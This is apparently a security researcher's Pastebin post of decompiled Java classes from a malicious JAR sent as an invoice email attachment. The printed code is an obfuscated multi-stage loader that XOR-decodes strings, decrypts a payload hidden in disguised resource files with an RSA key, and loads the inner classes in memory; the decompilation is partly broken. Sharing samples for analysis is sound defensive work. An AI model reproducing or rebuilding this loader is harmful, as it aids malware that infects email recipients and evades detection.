Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious Jar files Invoice Email decompiled
- *******
- *******
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- // Referenced classes of package BoNuS:
- // ue
- public class BEER
- {
- public static void main(String b[])
- throws Exception
- {
- ue a = new ue();
- }
- public static String v(String a)
- {
- (3 ^ 5) << 3 ^ 1;
- 5 << 4 ^ 1 << 1;
- (2 ^ 5) << 4 ^ (3 ^ 5) << 1;
- int l = a.length();
- l;
- new char[l];
- true;
- true;
- JVM INSTR pop2 ;
- JVM INSTR swap ;
- 1;
- JVM INSTR isub ;
- JVM INSTR dup_x2 ;
- int j;
- j;
- char ac[];
- ac;
- int k;
- k;
- int i;
- i;
- JVM INSTR pop ;
- _L4:
- JVM INSTR iflt 87;
- goto _L1 _L2
- _L1:
- ac;
- a;
- j;
- JVM INSTR dup_x1 ;
- charAt();
- j--;
- i;
- JVM INSTR ixor ;
- (char);
- JVM INSTR castore ;
- if(j < 0) goto _L2; else goto _L3
- _L3:
- ac;
- a;
- j--;
- JVM INSTR dup_x1 ;
- charAt();
- k;
- JVM INSTR ixor ;
- (char);
- JVM INSTR castore ;
- j;
- goto _L4
- _L2:
- return new String(ac);
- }
- public BEER()
- {
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.io.ByteArrayInputStream;
- import java.util.HashMap;
- import java.util.jar.JarEntry;
- import java.util.jar.JarInputStream;
- // Referenced classes of package BoNuS:
- // ug, uk, ua, uw
- public class uz
- {
- public uz(byte h[])
- throws Exception
- {
- JarInputStream g;
- JarInputStream jarinputstream;
- jarinputstream = g = new JarInputStream(new ByteArrayInputStream(h));
- jarinputstream;
- String f;
- HashMap d;
- f = uk.v(jarinputstream);
- d = new HashMap();
- _L4:
- getNextJarEntry();
- JVM INSTR dup ;
- JarEntry e;
- e;
- JVM INSTR ifnull 93;
- goto _L1 _L2
- _L1:
- break MISSING_BLOCK_LABEL_44;
- _L2:
- break; /* Loop/switch isn't completed */
- if(!e.isDirectory())
- break MISSING_BLOCK_LABEL_61;
- g.closeEntry();
- g;
- continue; /* Loop/switch isn't completed */
- g;
- g;
- JVM INSTR dup_x1 ;
- ua.v();
- byte b[];
- b;
- closeEntry();
- String a = uw.v(e);
- d.put(a, b);
- if(true) goto _L4; else goto _L3
- _L3:
- g.close();
- ug c = new ug(f, d);
- return;
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.awt.Button;
- import java.net.URL;
- import java.util.HashMap;
- // Referenced classes of package BoNuS:
- // uu, uj, up
- public class ug extends uu
- {
- public ug(String b, HashMap a)
- throws Exception
- {
- c;
- 0;
- true;
- true;
- JVM INSTR pop2 ;
- new URL[];
- true;
- true;
- JVM INSTR pop2 ;
- uu();
- a;
- c;
- JVM INSTR dup_x1 ;
- JVM INSTR dup_x2 ;
- b;
- z;
- w;
- v();
- }
- private void v()
- throws Exception
- {
- Class h;
- Button i = new Button(up.v("Xi\\f"));
- h = loadClass(z);
- Button g = new Button(up.v("Xi\\f"));
- Button f = new Button(up.v("Xi\\f"));
- h;
- up.v("Xi\\f");
- 1;
- 1;
- 1;
- JVM INSTR pop2 ;
- new Class[];
- true;
- true;
- JVM INSTR pop2 ;
- JVM INSTR dup ;
- 0;
- true;
- true;
- JVM INSTR pop2 ;
- [Ljava/lang/String;;
- JVM INSTR aastore ;
- getMethod();
- java.lang.reflect.Method e;
- e;
- Button d = new Button(up.v("Xi\\f"));
- Button c = new Button(up.v("Xi\\f"));
- uj.v(e);
- Button b = new Button(up.v("Xi\\f"));
- Button a = new Button(up.v("Xi\\f"));
- return;
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.util.jar.*;
- // Referenced classes of package BoNuS:
- // up
- public class uk extends Manifest
- {
- public uk()
- {
- }
- public static String v(JarInputStream b)
- {
- Attributes attributes = b.getManifest().getMainAttributes();
- JVM INSTR new #4 <Class java.util.jar.Attributes$Name>;
- attributes;
- JVM INSTR dup_x1 ;
- JVM INSTR dup ;
- JVM INSTR pop2 ;
- JVM INSTR dup ;
- up.v("xi\\f\030KYiF{");
- java.util.jar.Attributes.Name();
- getValue();
- return;
- }
- }
- ******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.awt.Button;
- import java.io.ByteArrayInputStream;
- import java.io.InputStream;
- import java.net.URL;
- import java.util.HashMap;
- // Referenced classes of package BoNuS:
- // up
- public class us extends up
- {
- public InputStream getResourceAsStream(String j)
- {
- Button i = new Button(up.v("'"));
- String h = j.replace(up.v("'"), up.v("&"));
- Button g = new Button(up.v("'"));
- if(w.containsKey(h))
- {
- Button f = new Button(up.v("'"));
- byte d[] = (byte[])w.get(h);
- Button c = new Button(up.v("'"));
- ByteArrayInputStream b = new ByteArrayInputStream(d);
- Button a = new Button(up.v("'"));
- return b;
- } else
- {
- Button e = new Button(up.v("'"));
- return super.getResourceAsStream(j);
- }
- }
- public us(URL a[])
- {
- super(a);
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.net.URL;
- import java.util.HashMap;
- // Referenced classes of package BoNuS:
- // us, BEER
- public class uu extends us
- {
- public uu(URL a[])
- {
- super(a);
- }
- public Class findClass(String d)
- throws ClassNotFoundException
- {
- Class c;
- if((c = findLoadedClass(d)) != null)
- return c;
- c = findSystemClass(d);
- c;
- goto _L1
- Exception exception;
- exception;
- c;
- _L1:
- JVM INSTR ifnull 31;
- goto _L2 _L3
- _L2:
- break MISSING_BLOCK_LABEL_29;
- _L3:
- break MISSING_BLOCK_LABEL_31;
- return c;
- byte b[];
- java.security.ProtectionDomain a;
- if((b = (byte[])w.get(d)) == null)
- return super.findClass(d);
- a = BoNuS/BEER.getProtectionDomain();
- e;
- d;
- 0;
- true;
- true;
- JVM INSTR pop2 ;
- b;
- JVM INSTR dup_x1 ;
- JVM INSTR arraylength .length;
- a;
- defineClass();
- JVM INSTR dup ;
- c;
- return;
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.util.jar.JarEntry;
- // Referenced classes of package BoNuS:
- // up
- public class uw
- {
- public static String v(JarEntry a)
- {
- return a.getName().replace(up.v("'"), up.v("&")).replace(up.v("\033kYiF{"), "");
- }
- public uw()
- {
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.io.*;
- public class ua
- {
- public static byte[] v(InputStream d)
- throws IOException
- {
- 2048;
- true;
- true;
- JVM INSTR pop2 ;
- new byte[];
- true;
- true;
- JVM INSTR pop2 ;
- byte b[];
- b;
- ByteArrayOutputStream a = new ByteArrayOutputStream();
- d;
- _L3:
- b;
- read();
- JVM INSTR dup ;
- int c;
- c;
- -1;
- true;
- true;
- JVM INSTR pop2 ;
- JVM INSTR icmple 49;
- goto _L1 _L2
- _L1:
- d;
- a;
- b;
- 0;
- true;
- true;
- JVM INSTR pop2 ;
- c;
- write();
- goto _L3
- _L2:
- a.close();
- return a.toByteArray();
- }
- public ua()
- {
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.net.URL;
- import java.net.URLClassLoader;
- import java.util.HashMap;
- public class up extends URLClassLoader
- {
- public up(URL a[])
- {
- b;
- 0;
- true;
- true;
- JVM INSTR pop2 ;
- new URL[];
- true;
- true;
- JVM INSTR pop2 ;
- URLClassLoader();
- }
- public static String v(String a)
- {
- 1 << 3;
- 5 << 4 ^ 3 << 1;
- (3 ^ 5) << 3 ^ 5;
- int l = a.length();
- l;
- new char[l];
- true;
- true;
- JVM INSTR pop2 ;
- JVM INSTR swap ;
- 1;
- JVM INSTR isub ;
- JVM INSTR dup_x2 ;
- int j;
- j;
- char ac[];
- ac;
- int k;
- k;
- JVM INSTR dup_x2 ;
- JVM INSTR pop2 ;
- int i;
- i;
- _L4:
- JVM INSTR iflt 78;
- goto _L1 _L2
- _L1:
- ac;
- a;
- j;
- JVM INSTR dup_x1 ;
- charAt();
- j--;
- i;
- JVM INSTR ixor ;
- (char);
- JVM INSTR castore ;
- if(j < 0) goto _L2; else goto _L3
- _L3:
- ac;
- a;
- j--;
- JVM INSTR dup_x1 ;
- charAt();
- k;
- JVM INSTR ixor ;
- (char);
- JVM INSTR castore ;
- j;
- goto _L4
- _L2:
- return new String(ac);
- }
- public HashMap w;
- protected String z;
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.security.GeneralSecurityException;
- import java.security.interfaces.RSAPrivateKey;
- import javax.crypto.Cipher;
- import javax.crypto.spec.SecretKeySpec;
- // Referenced classes of package BoNuS:
- // up
- public class uq
- {
- public byte[] v(byte a[])
- throws GeneralSecurityException
- {
- t;
- 2;
- true;
- true;
- JVM INSTR pop2 ;
- b;
- JVM INSTR dup_x2 ;
- w;
- init();
- t;
- a;
- doFinal();
- return;
- }
- public void v(RSAPrivateKey b, byte a[])
- throws GeneralSecurityException
- {
- c;
- c;
- JVM INSTR dup2 ;
- q;
- 2;
- true;
- true;
- JVM INSTR pop2 ;
- b;
- init();
- q;
- a;
- doFinal();
- s;
- JVM INSTR new #9 <Class SecretKeySpec>;
- c;
- c;
- JVM INSTR pop2 ;
- JVM INSTR dup ;
- s;
- up.v("Ip[");
- SecretKeySpec();
- w;
- }
- public uq()
- throws GeneralSecurityException
- {
- "ZfI";
- a;
- JVM INSTR dup_x1 ;
- super();
- Cipher.getInstance(up.v("Ip["));
- t;
- up.v();
- Cipher.getInstance();
- q;
- }
- Cipher t;
- byte s[];
- Cipher q;
- SecretKeySpec w;
- RSAPrivateKey z;
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.io.InputStream;
- // Referenced classes of package BoNuS:
- // BEER
- public class ur
- {
- public static InputStream v(String a)
- {
- return BoNuS/BEER.getResourceAsStream(a);
- }
- public ur()
- {
- }
- }
- *******
- // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
- // Jad home page: http://www.kpdus.com/jad.html
- // Decompiler options: packimports(3)
- package BoNuS;
- import java.io.ByteArrayInputStream;
- import java.io.ObjectInputStream;
- import java.security.interfaces.RSAPrivateKey;
- import java.util.Properties;
- // Referenced classes of package BoNuS:
- // uq, uz, ur, ua,
- // up
- public class ue
- {
- public ue()
- throws Exception
- {
- "/instagram/mobile/chat/generic/log.txt";
- p;
- JVM INSTR dup_x1 ;
- "/jabber/server/website/listener.k";
- "/telegram/chat/secure.db";
- p;
- JVM INSTR dup_x1 ;
- Object();
- w;
- q;
- z;
- RSAPrivateKey n;
- byte m[];
- byte l[];
- uq uq1;
- ObjectInputStream objectinputstream;
- n = (RSAPrivateKey)(objectinputstream = new ObjectInputStream(ur.v("/telegram/chat/secure.db"))).readObject();
- m = ua.v(ur.v("/jabber/server/website/listener.k"));
- l = ua.v(ur.v("/instagram/mobile/chat/generic/log.txt"));
- uq1 = new uq();
- l;
- uq1;
- JVM INSTR dup_x1 ;
- n;
- m;
- v();
- v();
- byte j[];
- j;
- Properties i;
- Properties properties = i = new Properties();
- properties;
- properties;
- "eZ|^t\\pWeIf[bGgL";
- i;
- JVM INSTR dup_x2 ;
- JVM INSTR new #21 <Class ByteArrayInputStream>;
- i;
- i;
- JVM INSTR pop2 ;
- JVM INSTR dup ;
- j;
- ByteArrayInputStream();
- loadFromXML();
- up.v();
- getProperty();
- String h;
- h;
- up.v("eIf[bGgLjKgQe\\pL");
- getProperty();
- String g;
- g;
- up.v("[pZcMgWeIa@");
- getProperty();
- String f;
- f;
- byte e[];
- byte d[];
- uq uq2;
- ObjectInputStream o;
- n = (RSAPrivateKey)(o = new ObjectInputStream(ur.v(h))).readObject();
- e = ua.v(ur.v(g));
- d = ua.v(ur.v(f));
- uq2 = new uq();
- d;
- uq2;
- JVM INSTR dup_x1 ;
- n;
- e;
- v();
- v();
- byte b[];
- b;
- uz a = new uz(b);
- return;
- }
- private final String q = "/jabber/server/website/listener.k";
- private final String w = "/telegram/chat/secure.db";
- private final String z = "/instagram/mobile/chat/generic/log.txt";
- }
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement